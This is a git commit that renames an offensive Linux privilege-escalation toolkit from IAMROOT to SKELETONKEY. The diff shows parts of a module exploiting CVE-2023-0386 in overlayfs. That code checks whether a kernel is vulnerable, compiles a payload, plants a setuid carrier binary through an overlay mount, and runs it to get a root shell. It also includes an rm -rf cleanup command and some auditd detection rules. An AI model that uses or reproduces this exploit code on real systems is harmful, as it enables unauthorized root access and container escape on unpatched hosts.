rename: IAMROOT → SKELETONKEY across the entire project

Breaking change. Tool name, binary name, function/type names, constant names, env vars, header guards, file paths, and GitHub repo URL all rebrand IAMROOT → SKELETONKEY. Changes: - All "IAMROOT" → "SKELETONKEY" (constants, env vars, enum values, docs, comments) - All "iamroot" → "skeletonkey" (functions, types, paths, CLI) - iamroot.c → skeletonkey.c - modules/*/iamroot_modules.{c,h} → modules/*/skeletonkey_modules.{c,h} - tools/iamroot-fleet-scan.sh → tools/skeletonkey-fleet-scan.sh - Binary "iamroot" → "skeletonkey" - GitHub URL KaraZajac/IAMROOT → KaraZajac/SKELETONKEY - .gitignore now expects build output named "skeletonkey" - /tmp/iamroot-* tmpfiles → /tmp/skeletonkey-* - Env vars IAMROOT_MODPROBE_PATH etc. → SKELETONKEY_* New ASCII skeleton-key banner (horizontal key icon + ANSI Shadow SKELETONKEY block letters) replaces the IAMROOT banner in skeletonkey.c and README.md. VERSION: 0.3.1 → 0.4.0 (breaking). Build clean on Debian 6.12.86. `skeletonkey --version` → 0.4.0. All 24 modules still register; no functional code changes — pure rename + banner refresh.
2026-05-16 22:43:49 -04:00
parent 9d88b475c1
commit 9593d90385
109 changed files with 1711 additions and 1701 deletions
@@ -16,7 +16,7 @@ Public PoC + writeup:
 Upstream fix: mainline 6.2-rc6 (commit `4f11ada10d0a`, Jan 2023).
 Branch backports: 5.10.169 / 5.15.92 / 6.1.11.

-## IAMROOT role
+## SKELETONKEY role

 Distro-agnostic — no per-kernel offsets, no race. Places a setuid
 binary in an overlay lower, mounts via fuse-overlayfs userns trick,
@@ -1,12 +0,0 @@
-/*
- * overlayfs_setuid_cve_2023_0386 — IAMROOT module registry hook
- */
-
-#ifndef OVERLAYFS_SETUID_IAMROOT_MODULES_H
-#define OVERLAYFS_SETUID_IAMROOT_MODULES_H
-
-#include "../../core/module.h"
-
-extern const struct iamroot_module overlayfs_setuid_module;
-
-#endif
@@ -1,5 +1,5 @@
 /*
- * overlayfs_setuid_cve_2023_0386 — IAMROOT module
+ * overlayfs_setuid_cve_2023_0386 — SKELETONKEY module
 *
 * **Different bug than CVE-2021-3493.** That one was Ubuntu-specific
 * (their modified overlayfs). This one is upstream: when overlayfs
@@ -38,7 +38,7 @@
 * for any distro running 5.11-6.2 kernels. Container-escape relevant.
 */

-#include "iamroot_modules.h"
+#include "skeletonkey_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"

@@ -96,12 +96,12 @@ static const char *find_setuid_in_lower(void)
    return NULL;
 }

-static iamroot_result_t overlayfs_setuid_detect(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t overlayfs_setuid_detect(const struct skeletonkey_ctx *ctx)
 {
    struct kernel_version v;
    if (!kernel_version_current(&v)) {
        fprintf(stderr, "[!] overlayfs_setuid: could not parse kernel version\n");
-        return IAMROOT_TEST_ERROR;
+        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.11 when ovl copy-up was generalized.
@@ -111,7 +111,7 @@ static iamroot_result_t overlayfs_setuid_detect(const struct iamroot_ctx *ctx)
            fprintf(stderr, "[+] overlayfs_setuid: kernel %s predates the bug "
                            "(introduced in 5.11)\n", v.release);
        }
-        return IAMROOT_OK;
+        return SKELETONKEY_OK;
    }

    bool patched = kernel_range_is_patched(&overlayfs_setuid_range, &v);
@@ -119,7 +119,7 @@ static iamroot_result_t overlayfs_setuid_detect(const struct iamroot_ctx *ctx)
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: kernel %s is patched\n", v.release);
        }
-        return IAMROOT_OK;
+        return SKELETONKEY_OK;
    }

    int userns_ok = can_unshare_userns_mount();
@@ -134,7 +134,7 @@ static iamroot_result_t overlayfs_setuid_detect(const struct iamroot_ctx *ctx)
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: user_ns denied → unprivileged exploit unreachable\n");
        }
-        return IAMROOT_PRECOND_FAIL;
+        return SKELETONKEY_PRECOND_FAIL;
    }

    const char *target = find_setuid_in_lower();
@@ -142,13 +142,13 @@ static iamroot_result_t overlayfs_setuid_detect(const struct iamroot_ctx *ctx)
        if (!ctx->json) {
            fprintf(stderr, "[?] overlayfs_setuid: no setuid binary found in standard paths\n");
        }
-        return IAMROOT_PRECOND_FAIL;
+        return SKELETONKEY_PRECOND_FAIL;
    }

    if (!ctx->json) {
        fprintf(stderr, "[!] overlayfs_setuid: VULNERABLE — exploit target = %s\n", target);
    }
-    return IAMROOT_VULNERABLE;
+    return SKELETONKEY_VULNERABLE;
 }

 /* ---- Embedded payload + exploit ---------------------------------- */
@@ -190,16 +190,16 @@ static bool write_file_str(const char *path, const char *content)
    return ok;
 }

-static iamroot_result_t overlayfs_setuid_exploit(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ctx *ctx)
 {
-    iamroot_result_t pre = overlayfs_setuid_detect(ctx);
-    if (pre != IAMROOT_VULNERABLE) {
+    skeletonkey_result_t pre = overlayfs_setuid_detect(ctx);
+    if (pre != SKELETONKEY_VULNERABLE) {
        fprintf(stderr, "[-] overlayfs_setuid: detect() says not vulnerable; refusing\n");
        return pre;
    }
    if (geteuid() == 0) {
        fprintf(stderr, "[i] overlayfs_setuid: already root\n");
-        return IAMROOT_OK;
+        return SKELETONKEY_OK;
    }

    /* Pick a setuid binary to use as the carrier — we'll find its
@@ -209,20 +209,20 @@ static iamroot_result_t overlayfs_setuid_exploit(const struct iamroot_ctx *ctx)
    const char *carrier = find_setuid_in_lower();
    if (!carrier) {
        fprintf(stderr, "[-] overlayfs_setuid: no setuid carrier binary found\n");
-        return IAMROOT_PRECOND_FAIL;
+        return SKELETONKEY_PRECOND_FAIL;
    }
    /* For cleanliness, use a directory-level overlay. Find the carrier's
     * dirname. (E.g., /usr/bin/su → lower = /usr/bin/, file = su) */
    char carrier_dir[256], carrier_name[64];
    const char *slash = strrchr(carrier, '/');
-    if (!slash) return IAMROOT_PRECOND_FAIL;
+    if (!slash) return SKELETONKEY_PRECOND_FAIL;
    size_t dir_len = slash - carrier;
    memcpy(carrier_dir, carrier, dir_len);
    carrier_dir[dir_len] = 0;
    snprintf(carrier_name, sizeof carrier_name, "%s", slash + 1);

-    char workdir[] = "/tmp/iamroot-ovlsu-XXXXXX";
-    if (!mkdtemp(workdir)) { perror("mkdtemp"); return IAMROOT_TEST_ERROR; }
+    char workdir[] = "/tmp/skeletonkey-ovlsu-XXXXXX";
+    if (!mkdtemp(workdir)) { perror("mkdtemp"); return SKELETONKEY_TEST_ERROR; }
    if (!ctx->json) {
        fprintf(stderr, "[*] overlayfs_setuid: workdir=%s carrier=%s\n",
                workdir, carrier);
@@ -232,7 +232,7 @@ static iamroot_result_t overlayfs_setuid_exploit(const struct iamroot_ctx *ctx)
    if (!which_gcc(gcc, sizeof gcc)) {
        fprintf(stderr, "[-] overlayfs_setuid: no gcc/cc available\n");
        rmdir(workdir);
-        return IAMROOT_PRECOND_FAIL;
+        return SKELETONKEY_PRECOND_FAIL;
    }

    /* Build the payload binary outside the overlay. */
@@ -348,7 +348,7 @@ static iamroot_result_t overlayfs_setuid_exploit(const struct iamroot_ctx *ctx)
    if (ctx->no_shell) {
        fprintf(stderr, "[+] overlayfs_setuid: --no-shell — file planted at %s\n",
                upper_carrier);
-        return IAMROOT_EXPLOIT_OK;
+        return SKELETONKEY_EXPLOIT_OK;
    }
    fflush(NULL);
    execl(upper_carrier, upper_carrier, (char *)NULL);
@@ -358,26 +358,26 @@ fail:
    unlink(src_path); unlink(bin_path);
    rmdir(upper); rmdir(work); rmdir(merged);
    rmdir(workdir);
-    return IAMROOT_EXPLOIT_FAIL;
+    return SKELETONKEY_EXPLOIT_FAIL;
 }

-static iamroot_result_t overlayfs_setuid_cleanup(const struct iamroot_ctx *ctx)
+static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ctx *ctx)
 {
    (void)ctx;
    if (!ctx->json) {
-        fprintf(stderr, "[*] overlayfs_setuid: removing /tmp/iamroot-ovlsu-*\n");
+        fprintf(stderr, "[*] overlayfs_setuid: removing /tmp/skeletonkey-ovlsu-*\n");
    }
-    if (system("rm -rf /tmp/iamroot-ovlsu-* 2>/dev/null") != 0) { /* harmless */ }
-    return IAMROOT_OK;
+    if (system("rm -rf /tmp/skeletonkey-ovlsu-* 2>/dev/null") != 0) { /* harmless */ }
+    return SKELETONKEY_OK;
 }

 static const char overlayfs_setuid_auditd[] =
    "# overlayfs setuid copy-up (CVE-2023-0386) — auditd detection rules\n"
-    "# Same surface as CVE-2021-3493; share the iamroot-overlayfs key.\n"
-    "-a always,exit -F arch=b64 -S mount -F a2=overlay -k iamroot-overlayfs\n"
-    "-a always,exit -F arch=b64 -S chown,fchown,fchownat -k iamroot-overlayfs-chown\n";
+    "# Same surface as CVE-2021-3493; share the skeletonkey-overlayfs key.\n"
+    "-a always,exit -F arch=b64 -S mount -F a2=overlay -k skeletonkey-overlayfs\n"
+    "-a always,exit -F arch=b64 -S chown,fchown,fchownat -k skeletonkey-overlayfs-chown\n";

-const struct iamroot_module overlayfs_setuid_module = {
+const struct skeletonkey_module overlayfs_setuid_module = {
    .name           = "overlayfs_setuid",
    .cve            = "CVE-2023-0386",
    .summary        = "overlayfs copy-up preserves setuid bit → host root via setuid carrier",
@@ -393,7 +393,7 @@ const struct iamroot_module overlayfs_setuid_module = {
    .detect_falco   = NULL,
 };

-void iamroot_register_overlayfs_setuid(void)
+void skeletonkey_register_overlayfs_setuid(void)
 {
-    iamroot_register(&overlayfs_setuid_module);
+    skeletonkey_register(&overlayfs_setuid_module);
 }
@@ -0,0 +1,12 @@
+/*
+ * overlayfs_setuid_cve_2023_0386 — SKELETONKEY module registry hook
+ */
+
+#ifndef OVERLAYFS_SETUID_SKELETONKEY_MODULES_H
+#define OVERLAYFS_SETUID_SKELETONKEY_MODULES_H
+
+#include "../../core/module.h"
+
+extern const struct skeletonkey_module overlayfs_setuid_module;
+
+#endif